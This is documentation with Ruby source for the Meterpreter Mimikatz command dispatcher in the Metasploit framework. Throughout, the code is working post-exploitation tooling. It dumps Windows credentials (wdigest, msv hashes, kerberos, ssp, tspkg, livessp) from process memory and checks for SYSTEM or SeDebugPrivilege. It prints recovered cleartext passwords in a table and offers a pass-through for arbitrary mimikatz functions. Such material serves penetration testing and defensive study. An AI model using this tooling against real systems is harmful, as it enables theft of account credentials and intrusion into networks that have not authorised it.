class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Mimikatz
Mimikatz
extension - grabs credentials from Windows process memory. Retrieved secrets (including cleartext passwords) are printed to the console, so treat session output and logs as sensitive.
Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Constants
- Klass
Public Class Methods
new(shell)
Initializes an instance of the mimikatz command interaction and warns if the loaded extension's architecture does not match the target's.
Calls superclass method
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::new
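# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 26
# Initializes the mimikatz command dispatcher for +shell+ and warns when the
# bitness of the loaded extension does not match the target.
#
# @param shell [Object] the console shell this dispatcher belongs to
#   (forwarded unchanged to the superclass initializer).
def initialize(shell)
  super

  # Loading the x86 build of the extension into an x64 target is only warned
  # about, not refused. NOTE(review): a 32-bit extension presumably cannot
  # read the 64-bit LSASS, so the credential commands are expected to fail
  # or come back empty in that case — confirm before relying on output.
  if client.platform =~ /x86/ && client.sys.config.sysinfo['Architecture'] =~ /x64/
    print_line
    print_warning("Loaded x86 Mimikatz on an x64 architecture.")
  end
end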
Public Instance Methods
cmd_kerberos(*args)
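# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 141
# Retrieves credentials from the "kerberos" provider on the target and prints
# them as a table (see mimikatz_request).
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_kerberos(*args)
  # A lambda instead of Proc.new: identical zero-argument call, but a stray
  # +return+ inside the body could not unwind this method.
  mimikatz_request("kerberos", -> { client.mimikatz.kerberos })
end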
cmd_livessp(*args)
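# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 126
# Retrieves credentials from the "livessp" provider on the target and prints
# them as a table (see mimikatz_request).
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_livessp(*args)
  # Lambda rather than Proc.new so a +return+ in the body stays local.
  mimikatz_request("livessp", -> { client.mimikatz.livessp })
end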
cmd_mimikatz_command(*args)
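# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 55
# Runs an arbitrary mimikatz function on the target.
#
# Options (parsed by @@command_opts, defined elsewhere in the file):
#   -f func   mimikatz function to execute, e.g. sekurlsa::wdigest (required)
#   -a args   whitespace-separated argument string passed to the function
#   -h        print usage
#
# The function name and arguments are forwarded to the remote extension
# verbatim; nothing is validated here, which is intentional for an
# operator-driven pass-through.
#
# @param args [Array<String>] raw command-line tokens; empty means "-h".
# @return [true] after printing usage or an error; otherwise whatever
#   client.mimikatz.send_custom_command returns.
def cmd_mimikatz_command(*args)
  args.unshift("-h") if args.empty?

  cmd_args = nil
  cmd_func = nil

  @@command_opts.parse(args) do |opt, _idx, val|
    case opt
    when "-a"
      cmd_args = val
    when "-f"
      cmd_func = val
    when "-h"
      print(
        "Usage: mimikatz_command -f func -a args\n\n" +
        "Executes a mimikatz command on the remote machine.\n" +
        "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
        @@command_opts.usage)
      # Returns from cmd_mimikatz_command itself, not just the block.
      return true
    end
  end

  unless cmd_func
    print_error("You must specify a function with -f")
    return true
  end

  # Plain whitespace split: quoting inside -a is not honoured, so a single
  # argument containing spaces cannot be passed as one token.
  arguments = cmd_args ? cmd_args.split(" ") : []

  print_line
  client.mimikatz.send_custom_command(cmd_func, arguments)
end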
cmd_msv(*args)
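# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 121
# Retrieves credentials from the "msv" provider (password hashes, per the
# command help text) and prints them as a table (see mimikatz_request).
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_msv(*args)
  # Lambda rather than Proc.new so a +return+ in the body stays local.
  mimikatz_request("msv", -> { client.mimikatz.msv })
end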
cmd_ssp(*args)
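# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 131
# Retrieves credentials from the "ssp" provider on the target and prints
# them as a table (see mimikatz_request).
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_ssp(*args)
  # Lambda rather than Proc.new so a +return+ in the body stays local.
  mimikatz_request("ssp", -> { client.mimikatz.ssp })
end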
cmd_tspkg(*args)
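# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 136
# Retrieves credentials from the "tspkg" provider on the target and prints
# them as a table (see mimikatz_request).
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_tspkg(*args)
  # Lambda rather than Proc.new so a +return+ in the body stays local.
  mimikatz_request("tspkg", -> { client.mimikatz.tspkg })
end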
cmd_wdigest(*args)
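# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 116
# Retrieves credentials from the "wdigest" provider on the target and prints
# them as a table (see mimikatz_request).
#
# NOTE(review): whether this yields cleartext passwords presumably depends on
# the target's WDigest credential-caching configuration; nothing here checks
# it, so an empty Password column is not necessarily an error — confirm.
#
# @param args [Array] ignored; the command takes no options.
# @return [true]
def cmd_wdigest(*args)
  # Lambda rather than Proc.new so a +return+ in the body stays local.
  mimikatz_request("wdigest", -> { client.mimikatz.wdigest })
end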
commands()
List of supported commands.
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 37
# Maps each command name this dispatcher handles to its help text.
# Pairs are listed in display order; the resulting Hash keeps that order.
#
# @return [Hash{String => String}] command name => description
def commands
  Hash[[
    ["mimikatz_command", "Run a custom command"],
    ["wdigest",          "Attempt to retrieve wdigest creds"],
    ["msv",              "Attempt to retrieve msv creds (hashes)"],
    ["livessp",          "Attempt to retrieve livessp creds"],
    ["ssp",              "Attempt to retrieve ssp creds"],
    ["tspkg",            "Attempt to retrieve tspkg creds"],
    ["kerberos",         "Attempt to retrieve kerberos creds"]
  ]]
end
get_privs()
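# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 146
# Reports the session's privilege level before a credential dump. When not
# SYSTEM, asks the session for its privileges and reports whether
# SeDebugPrivilege is among them.
#
# This only prints; it never aborts. NOTE(review): the subsequent request
# presumably needs SYSTEM or SeDebugPrivilege to read LSASS, so a
# "Did not get SeDebugPrivilege" warning likely means the dump will fail or
# return nothing — confirm against the extension's behaviour.
#
# @return [nil] (the value of the last print_* call)
def get_privs
  if system_check
    print_good("Running as SYSTEM")
  else
    print_status("Attempting to getprivs")
    privs = client.sys.config.getprivs
    if privs.include?("SeDebugPrivilege")
      print_good("Got SeDebugPrivilege")
    else
      print_warning("Did not get SeDebugPrivilege")
    end
  end
end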
mimikatz_request(provider, method)
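# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 92
# Shared driver for the per-provider credential commands: reports privileges,
# invokes +method+ to fetch the accounts and prints them as a table.
#
# @param provider [String] label used in the status line and table header.
# @param method [#call] zero-argument callable returning an array of account
#   hashes keyed by :authid, :package, :domain, :user and :password.
# @return [true]
def mimikatz_request(provider, method)
  get_privs
  print_status("Retrieving #{provider} credentials")

  # A failed or empty request must not become a NoMethodError on nil.each;
  # an empty table is printed instead.
  accounts = method.call || []

  table = Rex::Ui::Text::Table.new(
    'Header'    => "#{provider} credentials",
    'Indent'    => 0,
    # Index 4 is the Password column. Presumably intended so identical
    # secrets line up together — confirm if a per-user sort is wanted.
    'SortIndex' => 4,
    'Columns'   => ['AuthID', 'Package', 'Domain', 'User', 'Password']
  )

  accounts.each do |acc|
    # The secret may be nil or span several lines; flatten it to one cell so
    # the table stays one row per account. Other columns print as returned.
    table << [
      acc[:authid],
      acc[:package],
      acc[:domain],
      acc[:user],
      acc[:password].to_s.delete("\n")
    ]
  end

  # Cleartext secrets go straight to the console (and anything spooling it);
  # this method does not persist them anywhere.
  print_line table.to_s
  true
end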
name()
Name for this dispatcher
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 172
# Display name of this dispatcher, as shown by the console.
#
# @return [String]
def name
  'Mimikatz'
end
system_check()
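# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 160
# Reports whether the session runs as LocalSystem, printing a warning when
# it does not.
#
# NOTE(review): this is a string compare against the English account name.
# On localized Windows builds getuid may return a translated name, so this
# could report "not SYSTEM" for a SYSTEM session; a SID (S-1-5-18) check
# would be locale-independent — confirm against getuid's real output.
#
# @return [Boolean] true when getuid reports "NT AUTHORITY\SYSTEM".
def system_check
  return true if client.sys.config.getuid == "NT AUTHORITY\\SYSTEM"

  print_warning("Not currently running as SYSTEM")
  false
end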